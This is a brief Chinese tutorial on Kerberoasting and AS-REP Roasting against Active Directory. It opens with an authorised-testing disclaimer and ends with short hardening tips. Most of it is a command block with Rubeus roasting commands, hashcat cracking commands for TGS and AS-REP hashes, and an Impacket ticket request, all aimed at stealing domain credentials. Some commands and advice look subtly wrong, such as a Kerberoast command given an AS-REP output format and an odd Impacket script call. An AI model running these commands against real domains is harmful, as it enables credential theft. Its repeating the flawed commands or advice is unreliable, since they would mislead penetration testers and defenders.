Kerberoasting与AS-REP-Roasting实战

Kerberoasting 和 AS-REP Roasting 实战:Rubeus 工具、hashcat 破解、Impacket 利用,含防御加固。

写在前面:合法学习边界

域渗透只在授权测试环境进行。对非授权 AD 域进行攻击可能触犯法律。

一、Kerberoasting 实战

Kerberoasting 与 AS-REP Roasting
1
2
Kerberoasting:有域用户 → 请求 TGS → hashcat 破解
AS-REP Roasting:无域用户 → 请求 TGT → hashcat 破解

二、常用命令

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
# Rubeus Kerberoasting
Rubeus.exe kerberoast /format:asreproast

# Rubeus AS-REP Roasting
Rubeus.exe asreproast /format:asreproast

# hashcat 破解
hashcat -m 13100 tgs.out rockyou.txt
hashcat -m 18200 asrep.out rockyou.txt

# Impacket getTGS
getTGS.py domain/user /spn:HTTP/target

三、防御加固

1
2
3
强制启用 Kerberos 预认证
使用强密码(16位+大小写+特殊字符)
监控异常 TGS 请求

四、小结

Kerberoasting 是域渗透中最常见的凭据获取方式。防御核心是强制启用预认证 + 强密码策略